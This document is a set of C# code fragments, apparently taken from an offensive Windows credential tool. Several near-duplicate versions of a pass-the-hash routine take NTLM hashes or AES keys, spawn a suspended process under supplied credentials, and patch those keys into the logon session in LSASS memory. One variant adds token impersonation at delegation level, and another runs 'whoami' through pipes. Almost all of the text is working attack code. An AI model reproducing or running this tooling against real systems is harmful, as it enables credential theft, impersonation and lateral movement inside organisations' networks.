public static void LogonSessionEnum() { int infoLength = 0; IntPtr tokenInformation; // since TokenInformation is a buffer, we need to call GetTokenInformation twice, first time to get the length for the buffer GetTokenInformation(WindowsIdentity.GetCurrent().Token, TOKEN_INFORMATION_CLASS.TokenStatistics, IntPtr.Zero, 0, out infoLength); tokenInformation = Marshal.AllocHGlobal(infoLength); GetTokenInformation(System.Security.Principal.WindowsIdentity.GetCurrent().Token, TOKEN_INFORMATION_CLASS.TokenStatistics, tokenInformation, infoLength, out infoLength); TOKEN_STATISTICS tokenStatistics = (TOKEN_STATISTICS)Marshal.PtrToStructure(tokenInformation, typeof(TOKEN_STATISTICS)); EnumerateLogonSessions(tokenStatistics.AuthenticationId.LowPart); Marshal.FreeHGlobal(tokenInformation); }
internal TokenStatistics(IntPtr ptr) { TOKEN_STATISTICS ts = (TOKEN_STATISTICS)Marshal.PtrToStructure(ptr, typeof(TOKEN_STATISTICS)); _tokenId = new Luid(ts.TokenId); _authenticationId = new Luid(ts.AuthenticationId); _expirationTime = new DateTime(ts.ExpirationTime); _tokenType = ts.TokenType; _impersonationLevel = ts.ImpersonationLevel; _dynamicCharged = ts.DynamicCharged; _dynamicAvailable = ts.DynamicAvailable; _groupCount = ts.GroupCount; _privilegeCount = ts.PrivilegeCount; _modifiedId = new Luid(ts.ModifiedId); }
public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false) { TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS(); byte[] aes128bytes = null; byte[] aes256bytes = null; Pth.SEKURLSA_PTH_DATA data = new Pth.SEKURLSA_PTH_DATA(); byte[] ntlmHashbytes = null; int procid; if (!string.IsNullOrEmpty(luid)) { tokenStats.AuthenticationId.HighPart = 0; tokenStats.AuthenticationId.LowPart = uint.Parse(luid); data.LogonId = tokenStats.AuthenticationId; } else { if (string.IsNullOrEmpty(user)) { Console.WriteLine("[x] Missing required parameter user"); return(1); } if (string.IsNullOrEmpty(domain)) { Console.WriteLine("[x] Missing required parameter domain"); return(1); } } try { if (!string.IsNullOrEmpty(aes128)) { aes128bytes = Utility.StringToByteArray(aes128); if (aes128bytes.Length != AES_128_KEY_LENGTH) { throw new System.ArgumentException(); } data.Aes128Key = aes128bytes; Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes)); } } catch (Exception) { Console.WriteLine("[x] Invalid aes128 key"); return(1); } try { if (!string.IsNullOrEmpty(aes256)) { aes256bytes = Utility.StringToByteArray(aes256); if (aes256bytes.Length != AES_256_KEY_LENGTH) { throw new System.ArgumentException(); } data.Aes256Key = aes256bytes; Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes)); } } catch (Exception) { Console.WriteLine("[x] Invalid aes128 key"); return(1); } try { if (!string.IsNullOrEmpty(rc4)) { ntlmHashbytes = Utility.StringToByteArray(rc4); } if (!string.IsNullOrEmpty(ntlmHash)) { ntlmHashbytes = Utility.StringToByteArray(ntlmHash); } if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH) { throw new System.ArgumentException(); } data.NtlmHash = ntlmHashbytes; } catch (Exception) { Console.WriteLine("[x] Invalid Ntlm hash/rc4 key"); return(1); } if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null) { if (!string.IsNullOrEmpty(luid)) { Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data); } else if (!string.IsNullOrEmpty(user)) { //pipe for stdin and stdout var saHandles = new SECURITY_ATTRIBUTES(); saHandles.nLength = Marshal.SizeOf(saHandles); saHandles.bInheritHandle = true; saHandles.lpSecurityDescriptor = IntPtr.Zero; IntPtr hStdOutRead; IntPtr hStdOutWrite; IntPtr hStdInRead; IntPtr hStdInWrite; // StdOut pipe CreatePipe(out hStdOutRead, out hStdOutWrite, ref saHandles, 999999); SetHandleInformation(hStdOutRead, HANDLE_FLAGS.INHERIT, 0); // StdIn pipe CreatePipe(out hStdInRead, out hStdInWrite, ref saHandles, 999999); SetHandleInformation(hStdInWrite, HANDLE_FLAGS.INHERIT, 0); // PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); STARTUPINFOEX si = new STARTUPINFOEX(); si.StartupInfo.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFOEX)); si.StartupInfo.hStdInput = hStdInRead; si.StartupInfo.hStdErr = hStdOutWrite; si.StartupInfo.hStdOutput = hStdOutWrite; si.StartupInfo.dwFlags = 0x00000001 | 0x00000100; si.StartupInfo.wShowWindow = 0x0000; if (!Win32.Natives.CreateProcessWithLogonW(user, "", domain, LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\cmd.exe", @"C:\Windows\System32\cmd.exe", CreationFlags.CREATE_SUSPENDED, 0, @"C:\Windows\System32\", ref si, out pi)) { procid = pi.dwProcessId; IntPtr hToken = IntPtr.Zero; if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken)) { IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats)); Marshal.StructureToPtr(tokenStats, hTokenInformation, false); uint retlen = 0; if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen)) { tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS)); data.LogonId = tokenStats.AuthenticationId; Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data); if (data.isReplaceOk) { NtResumeProcess(pi.hProcess); WriteToPipe(hStdInWrite, "/c whoami"); Console.WriteLine(ReadFromPipe(pi.hProcess, hStdOutRead, Encoding.GetEncoding(GetConsoleOutputCP()))); return(procid); } else { NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating); } } else { Console.WriteLine("[x] Error GetTokenInformazion"); return(1); } } else { Console.WriteLine("[x] Error open process"); return(1); } } else { Console.WriteLine("[x] Error process create"); return(1); } } else { Console.WriteLine("[x] Bad user or LUID"); return(1); } } else { Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256"); return(1); } return(0); }
internal static extern Boolean GetTokenInformation(IntPtr TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, ref TOKEN_STATISTICS TokenInformation, UInt32 TokenInformationLength, out UInt32 ReturnLength);
/*[StructLayout(LayoutKind.Sequential)] * public struct SEKURLSA_PTH_DATA * { * public IntPtr LogonId;//LUID * public IntPtr NtlmHash;//BYTE * public IntPtr Aes256Key;//BYTE * public IntPtr Aes128Key;//BYTE * public bool isReplaceOk; * }*/ public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false) { TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS(); string lcommand = string.Empty; byte[] aes128bytes = null; byte[] aes256bytes = null; SEKURLSA_PTH_DATA data = new SEKURLSA_PTH_DATA(); byte[] ntlmHashbytes = null; string lntlmhash = string.Empty; if (!string.IsNullOrEmpty(luid)) { tokenStats.AuthenticationId.HighPart = 0; tokenStats.AuthenticationId.LowPart = uint.Parse(luid); data.LogonId = tokenStats.AuthenticationId; } else { if (string.IsNullOrEmpty(user)) { Console.WriteLine("[x] Missing required parameter user"); return(1); } if (string.IsNullOrEmpty(domain)) { Console.WriteLine("[x] Missing required parameter domain"); return(1); } if (impersonate) { lcommand = Assembly.GetExecutingAssembly().CodeBase; } else { lcommand = binary; } Console.WriteLine("[*] user\t: {0}", user); Console.WriteLine("[*] domain\t: {0}", domain); Console.WriteLine("[*] program\t: {0}", lcommand); Console.WriteLine("[*] impers.\t: {0}", impersonate); } try { if (!string.IsNullOrEmpty(aes128)) { aes128bytes = Utility.StringToByteArray(aes128); if (aes128bytes.Length != AES_128_KEY_LENGTH) { throw new System.ArgumentException(); } data.Aes128Key = aes128bytes; Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes)); } } catch (Exception) { Console.WriteLine("[x] Invalid aes128 key"); return(1); } try { if (!string.IsNullOrEmpty(aes256)) { aes256bytes = Utility.StringToByteArray(aes256); if (aes256bytes.Length != AES_256_KEY_LENGTH) { throw new System.ArgumentException(); } data.Aes256Key = aes256bytes; Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes)); } } catch (Exception) { Console.WriteLine("[x] Invalid aes128 key"); return(1); } try { if (!string.IsNullOrEmpty(rc4)) { ntlmHashbytes = Utility.StringToByteArray(rc4); } if (!string.IsNullOrEmpty(ntlmHash)) { ntlmHashbytes = Utility.StringToByteArray(ntlmHash); } if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH) { throw new System.ArgumentException(); } data.NtlmHash = ntlmHashbytes; Console.WriteLine("[*] NTLM\t: {0}", Utility.PrintHashBytes(ntlmHashbytes)); } catch (Exception) { Console.WriteLine("[x] Invalid Ntlm hash/rc4 key"); return(1); } if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null) { if (!string.IsNullOrEmpty(luid)) { Console.WriteLine("[*] mode\t: replacing NTLM/RC4 key in a session"); Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data); } else if (!string.IsNullOrEmpty(user)) { PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); if (CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi)) { Console.WriteLine("[*] | PID {0}", pi.dwProcessId); Console.WriteLine("[*] | TID {0}", pi.dwThreadId); IntPtr hToken = IntPtr.Zero; if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken)) { IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats)); Marshal.StructureToPtr(tokenStats, hTokenInformation, false); uint retlen = 0; if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen)) { tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS)); data.LogonId = tokenStats.AuthenticationId; Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data); if (data.isReplaceOk) { if (impersonate) { SECURITY_ATTRIBUTES at = new SECURITY_ATTRIBUTES(); IntPtr hNewToken = IntPtr.Zero; if (DuplicateTokenEx(hToken, TOKEN_QUERY | TOKEN_IMPERSONATE, ref at, (int)SECURITY_IMPERSONATION_LEVEL.SecurityDelegation, (int)TOKEN_TYPE.TokenImpersonation, ref hNewToken)) { if (SetThreadToken(IntPtr.Zero, hNewToken)) { Console.WriteLine("[*] ** Token Impersonation **"); } else { Console.WriteLine("[x] Error SetThreadToken"); return(1); } CloseHandle(hNewToken); } else { Console.WriteLine("[x] Error DuplicateTokenEx"); return(1); } NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.Success); } else { NtResumeProcess(pi.hProcess); } } else { NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating); } } else { Console.WriteLine("[x] Error GetTokenInformazion"); return(1); } } else { Console.WriteLine("[x] Error open process"); return(1); } } else { Console.WriteLine("[x] Error process create"); return(1); } } else { Console.WriteLine("[x] Bad user or LUID"); return(1); } } else { Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256"); return(1); } return(0); }
public static int CreateProcess(IntPtr hProcess, IntPtr lsasrvMem, IntPtr kerberos, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, string user, string domain, string ntlmHash = null, string aes128 = null, string aes256 = null, string rc4 = null, string binary = "cmd.exe", string arguments = "", string luid = null, bool impersonate = false) { TOKEN_STATISTICS tokenStats = new TOKEN_STATISTICS(); byte[] aes128bytes = null; byte[] aes256bytes = null; Pth.SEKURLSA_PTH_DATA data = new Pth.SEKURLSA_PTH_DATA(); byte[] ntlmHashbytes = null; int procid; if (!string.IsNullOrEmpty(luid)) { tokenStats.AuthenticationId.HighPart = 0; tokenStats.AuthenticationId.LowPart = uint.Parse(luid); data.LogonId = tokenStats.AuthenticationId; } else { if (string.IsNullOrEmpty(user)) { Console.WriteLine("[x] Missing required parameter user"); return(1); } if (string.IsNullOrEmpty(domain)) { Console.WriteLine("[x] Missing required parameter domain"); return(1); } } try { if (!string.IsNullOrEmpty(aes128)) { aes128bytes = Utility.StringToByteArray(aes128); if (aes128bytes.Length != AES_128_KEY_LENGTH) { throw new System.ArgumentException(); } data.Aes128Key = aes128bytes; Console.WriteLine("[*] AES128\t: {0}", Utility.PrintHexBytes(aes128bytes)); } } catch (Exception) { Console.WriteLine("[x] Invalid aes128 key"); return(1); } try { if (!string.IsNullOrEmpty(aes256)) { aes256bytes = Utility.StringToByteArray(aes256); if (aes256bytes.Length != AES_256_KEY_LENGTH) { throw new System.ArgumentException(); } data.Aes256Key = aes256bytes; Console.WriteLine("[*] AES256\t: {0}", Utility.PrintHexBytes(aes256bytes)); } } catch (Exception) { Console.WriteLine("[x] Invalid aes128 key"); return(1); } try { if (!string.IsNullOrEmpty(rc4)) { ntlmHashbytes = Utility.StringToByteArray(rc4); } if (!string.IsNullOrEmpty(ntlmHash)) { ntlmHashbytes = Utility.StringToByteArray(ntlmHash); } if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH) { throw new System.ArgumentException(); } data.NtlmHash = ntlmHashbytes; } catch (Exception) { Console.WriteLine("[x] Invalid Ntlm hash/rc4 key"); return(1); } if (data.NtlmHash != null || data.Aes128Key != null || data.Aes256Key != null) { if (!string.IsNullOrEmpty(luid)) { Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data); } else if (!string.IsNullOrEmpty(user)) { PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); if (CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi)) { procid = pi.dwProcessId; IntPtr hToken = IntPtr.Zero; if (OpenProcessToken(pi.hProcess, TOKEN_READ | (impersonate ? TOKEN_DUPLICATE : 0), out hToken)) { IntPtr hTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(tokenStats)); Marshal.StructureToPtr(tokenStats, hTokenInformation, false); uint retlen = 0; if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenStatistics, hTokenInformation, (uint)Marshal.SizeOf(tokenStats), out retlen)) { tokenStats = (TOKEN_STATISTICS)Marshal.PtrToStructure(hTokenInformation, typeof(TOKEN_STATISTICS)); data.LogonId = tokenStats.AuthenticationId; Pth_luid(hProcess, lsasrvMem, kerberos, oshelper, iv, aeskey, deskey, ref data); if (data.isReplaceOk) { NtResumeProcess(pi.hProcess); return(procid); } else { NtTerminateProcess(pi.hProcess, (uint)NTSTATUS.ProcessIsTerminating); } } else { Console.WriteLine("[x] Error GetTokenInformazion"); return(1); } } else { Console.WriteLine("[x] Error open process"); return(1); } } else { Console.WriteLine("[x] Error process create"); return(1); } } else { Console.WriteLine("[x] Bad user or LUID"); return(1); } } else { Console.WriteLine("[x] Missing at least one argument : ntlm/rc4 OR aes128 OR aes256"); return(1); } return(0); }